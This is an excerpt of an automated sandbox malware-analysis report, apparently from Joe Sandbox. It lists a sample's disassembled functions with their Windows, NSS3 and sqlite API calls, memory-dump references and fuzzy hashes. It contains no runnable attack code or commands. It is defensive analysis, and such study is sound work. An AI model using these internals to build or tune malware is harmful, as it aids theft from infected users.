                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Heap$AllocProcesslstrcpywsprintf
                                                                                          • String ID: Fs$%dx%d
                                                                                          • API String ID: 2716131235-1170756869
                                                                                          • Opcode ID: 66e761acad43debc60f61778fff7699e4179135cb3781a94481e90bfcfef83f1
                                                                                          • Instruction ID: 994268d552e07794471dd3910f4d3ddbdeb6f1ac9b11d1c79e25ca2fe4432fdb
                                                                                          • Opcode Fuzzy Hash: 66e761acad43debc60f61778fff7699e4179135cb3781a94481e90bfcfef83f1
                                                                                          • Instruction Fuzzy Hash: 492130B1A40608AFDB10DFA4DC45FAEBBB9FB48710F104119F605A7290C779A901CBA5
                                                                                          Function 6CB58FE0 Relevance: 7.6, APIs: 5, Instructions: 63threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6CB60710), ref: 6CB58FF1
                                                                                          • PR_CallOnce.NSS3(6CCA2158,6CB59150,00000000,?,?,?,6CB59138,?,6CB60710), ref: 6CB59029
                                                                                          • calloc.MOZGLUE(00000001,00000000,?,?,6CB60710), ref: 6CB5904D
                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6CB60710), ref: 6CB59066
                                                                                          • PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6CB60710), ref: 6CB59078
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: PrivateThread$CallOncecallocmemcpy
                                                                                          • String ID:
                                                                                          • API String ID: 1176783091-0
                                                                                          • Opcode ID: c77f6bf843013a0d349a0cafc8119a7ab93510bdac766936b830f0ff36849acf
                                                                                          • Instruction ID: dd8dca20d8f0a8dcf5f3f80739d924f6cb6250204d9ba4f88ed156167ddb29ee
                                                                                          • Opcode Fuzzy Hash: c77f6bf843013a0d349a0cafc8119a7ab93510bdac766936b830f0ff36849acf
                                                                                          • Instruction Fuzzy Hash: F11125A1B001A157E7101FE9AC04A6A32ACDB827ACF880821FD48C2A40F753CC6683A6
                                                                                          Function 6CB6CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6CB81E10: TlsGetValue.KERNEL32 ref: 6CB81E36
                                                                                            • Part of subcall function 6CB81E10: EnterCriticalSection.KERNEL32(?,?,?,6CB5B1EE,2404110F,?,?), ref: 6CB81E4B
                                                                                            • Part of subcall function 6CB81E10: PR_Unlock.NSS3 ref: 6CB81E76
                                                                                          • free.MOZGLUE(?,6CB6D079,00000000,00000001), ref: 6CB6CDA5
                                                                                          • PK11_FreeSymKey.NSS3(?,6CB6D079,00000000,00000001), ref: 6CB6CDB6
                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6CB6D079,00000000,00000001), ref: 6CB6CDCF
                                                                                          • DeleteCriticalSection.KERNEL32(?,6CB6D079,00000000,00000001), ref: 6CB6CDE2
                                                                                          • free.MOZGLUE(?), ref: 6CB6CDE9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                                                          • String ID:
                                                                                          • API String ID: 1720798025-0
                                                                                          • Opcode ID: 121cec03e7824712cbc2125d3ded8db684e560b8fe2ea8f31e8583b80533df02
                                                                                          • Instruction ID: 913646641816cca96251084992676d5ebf95a0ae4e5418616ad63ac5bc46b363
                                                                                          • Opcode Fuzzy Hash: 121cec03e7824712cbc2125d3ded8db684e560b8fe2ea8f31e8583b80533df02
                                                                                          • Instruction Fuzzy Hash: 481170B2B02165ABDF00AE66EC8599AB77CFB042697144121E91987E01E732F474C7E2
                                                                                          Function 6CBD2CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6CBD5B40: PR_GetIdentitiesLayer.NSS3 ref: 6CBD5B56
                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBD2CEC
                                                                                            • Part of subcall function 6CBEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBEC2BF
                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6CBD2D02
                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6CBD2D1F
                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6CBD2D42
                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6CBD2D5B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                          • String ID:
                                                                                          • API String ID: 1593528140-0
                                                                                          • Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                          • Instruction ID: 31907d2be50789fc6454db3c12b63218d2b13b90e039c0b848905f3937ce0ccc
                                                                                          • Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                          • Instruction Fuzzy Hash: 5001C4B1A002846BEA309F25FC40BC7B7A1EF45318F014525E95D86B20E633FC198793
                                                                                          Function 6CBD2D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6CBD5B40: PR_GetIdentitiesLayer.NSS3 ref: 6CBD5B56
                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBD2D9C
                                                                                            • Part of subcall function 6CBEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBEC2BF
                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6CBD2DB2
                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6CBD2DCF
                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6CBD2DF2
                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6CBD2E0B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                          • String ID:
                                                                                          • API String ID: 1593528140-0
                                                                                          • Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                          • Instruction ID: 1b1384aa7a37a274a94ca2ecc856b377a5e5bcc992de1c9309ef490b3eef8f99
                                                                                          • Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                          • Instruction Fuzzy Hash: 1C01C4B5A006805BEA309F25FC01BC7B7A1EF45358F010435E95D86B11E633F8298793
                                                                                          Function 6CB6AE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6CB53090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6CB6AE42), ref: 6CB530AA
                                                                                            • Part of subcall function 6CB53090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CB530C7
                                                                                            • Part of subcall function 6CB53090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6CB530E5
                                                                                            • Part of subcall function 6CB53090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CB53116
                                                                                            • Part of subcall function 6CB53090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CB5312B
                                                                                            • Part of subcall function 6CB53090: PK11_DestroyObject.NSS3(?,?), ref: 6CB53154
                                                                                            • Part of subcall function 6CB53090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB5317E
                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6CB499FF,?,?,?,?,?,?,?,?,?,6CB42D6B,?), ref: 6CB6AE67
                                                                                          • SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6CB499FF,?,?,?,?,?,?,?,?,?,6CB42D6B,?), ref: 6CB6AE7E
                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6CB42D6B,?,?,00000000), ref: 6CB6AE89
                                                                                          • PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6CB42D6B,?,?,00000000), ref: 6CB6AE96
                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6CB42D6B,?,?), ref: 6CB6AEA3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
                                                                                          • String ID:
                                                                                          • API String ID: 754562246-0
                                                                                          • Opcode ID: 922efefbaf5d0c12611f64bf17c88aaffbf2553ef1a85f32f5e1359c9ab68e70
                                                                                          • Instruction ID: dd806d7ebc3a6b07b84e09c74ec1ba010c382c7dcd3f6fa2d66675135d64e29a
                                                                                          • Opcode Fuzzy Hash: 922efefbaf5d0c12611f64bf17c88aaffbf2553ef1a85f32f5e1359c9ab68e70
                                                                                          • Instruction Fuzzy Hash: 5F01D1A6B000F097EB01926EEC81BAF31988F8765CB180031F906C7F41F716D9154BA3
                                                                                          Function 00418D00 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • StrStrA.SHLWAPI(0081A910,?,?,?,00410F1C,?,0081A910,00000000), ref: 00418D0C
                                                                                          • lstrcpyn.KERNEL32(0062D378,0081A910,0081A910,?,00410F1C,?,0081A910), ref: 00418D30
                                                                                          • lstrlenA.KERNEL32(?,?,00410F1C,?,0081A910), ref: 00418D47
                                                                                          • wsprintfA.USER32 ref: 00418D67
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcpynlstrlenwsprintf
                                                                                          • String ID: %s%s
                                                                                          • API String ID: 1206339513-3252725368
                                                                                          • Opcode ID: 95580f9ef10e992e71bb9d5f92c0387debde11b91ee44bd877bd47b6543a2d40
                                                                                          • Instruction ID: 934000c32db0b3497a9cf3f86b5bcb86f2a34007e8430f093dfbe5a2fe39e620
                                                                                          • Opcode Fuzzy Hash: 95580f9ef10e992e71bb9d5f92c0387debde11b91ee44bd877bd47b6543a2d40
                                                                                          • Instruction Fuzzy Hash: 4D0121B5500A08FFDB14DFA8D944EAE7B7AEF49354F108148F9099B340C731AA41CB95
                                                                                          Function 6CC5ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DeleteCriticalSection.KERNEL32(6CC5A6D8), ref: 6CC5AE0D
                                                                                          • free.MOZGLUE(?), ref: 6CC5AE14
                                                                                          • DeleteCriticalSection.KERNEL32(6CC5A6D8), ref: 6CC5AE36
                                                                                          • free.MOZGLUE(?), ref: 6CC5AE3D
                                                                                          • free.MOZGLUE(00000000,00000000,?,?,6CC5A6D8), ref: 6CC5AE47
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: free$CriticalDeleteSection
                                                                                          • String ID:
                                                                                          • API String ID: 682657753-0
                                                                                          • Opcode ID: 7014533b7f2bf766e0b138f0bff279210a45113af5f8bf6f2060575e962489cf
                                                                                          • Instruction ID: 7bed4a4faf5d0aa91bd5e05f384b2ff82c5ed563e82dd3307041e6fcdfd0fec1
                                                                                          • Opcode Fuzzy Hash: 7014533b7f2bf766e0b138f0bff279210a45113af5f8bf6f2060575e962489cf
                                                                                          • Instruction Fuzzy Hash: 8BF0F675201A01ABCA009F69D848917B778BF867747500328E12A83940E731E031C7D9
                                                                                          Function 0041C131 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __getptd.LIBCMT ref: 0041C13D
                                                                                            • Part of subcall function 0041B95F: __getptd_noexit.LIBCMT ref: 0041B962
                                                                                            • Part of subcall function 0041B95F: __amsg_exit.LIBCMT ref: 0041B96F
                                                                                          • __getptd.LIBCMT ref: 0041C154
                                                                                          • __amsg_exit.LIBCMT ref: 0041C162
                                                                                          • __lock.LIBCMT ref: 0041C172
                                                                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C186
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                          • String ID:
                                                                                          • API String ID: 938513278-0
                                                                                          • Opcode ID: c97b1cd8c1bf5e7720fb8207f6683a26967bfbf4c7aefb49925ecc618f12c84f
                                                                                          • Instruction ID: 8423f9a113a1835f1d35103eff65ed0838148ed172a20d49ff88b4dc443596f5
                                                                                          • Opcode Fuzzy Hash: c97b1cd8c1bf5e7720fb8207f6683a26967bfbf4c7aefb49925ecc618f12c84f
                                                                                          • Instruction Fuzzy Hash: 9EF06271AD5310ABD720BBA95C427DA3790AF00728F15410FE454A62D3CB6C58D19A9E
                                                                                          Function 6CAD6C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6CAD6D36
                                                                                          Strings
                                                                                          • %s at line %d of [%.10s], xrefs: 6CAD6D2F
                                                                                          • database corruption, xrefs: 6CAD6D2A
                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CAD6D20
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2584650252.000000006CAC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAC0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2584502257.000000006CAC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2587628478.000000006CC5F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588211945.000000006CC9E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588577558.000000006CC9F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2588804553.000000006CCA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2589242943.000000006CCA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6cac0000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: sqlite3_log
                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                          • API String ID: 632333372-598938438
                                                                                          • Opcode ID: 1e992da25c14c2b997f8229b4e63b7673fce25adf155fe86121111b1eb555585
                                                                                          • Instruction ID: 21036d2cc63fbbad7ccdde47bab4b84b641d13c05465e66124139b6fafd020f7
                                                                                          • Opcode Fuzzy Hash: 1e992da25c14c2b997f8229b4e63b7673fce25adf155fe86121111b1eb555585
                                                                                          • Instruction Fuzzy Hash: A921F470600B059BC710CE19E941B5AB7F2AF85308F25492CD8999BF51E371F9C98BA2
                                                                                          Function 004160D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416103
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                            • Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
                                                                                            • Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
                                                                                            • Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2
                                                                                            • Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5
                                                                                          • ShellExecuteEx.SHELL32(0000003C), ref: 004161C6
                                                                                          • ExitProcess.KERNEL32 ref: 004161F5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                                                          • String ID: <
                                                                                          • API String ID: 1148417306-4251816714
                                                                                          • Opcode ID: 9f9547f3f7281445564cbb279478ef6c86c25dbd0de0642ee68d0f3e0321a51d
                                                                                          • Instruction ID: 54b6532b0b3a1e4a3a0de688d9ef2eddded6cf57616e9fa182c501fcadca31e9
                                                                                          • Opcode Fuzzy Hash: 9f9547f3f7281445564cbb279478ef6c86c25dbd0de0642ee68d0f3e0321a51d
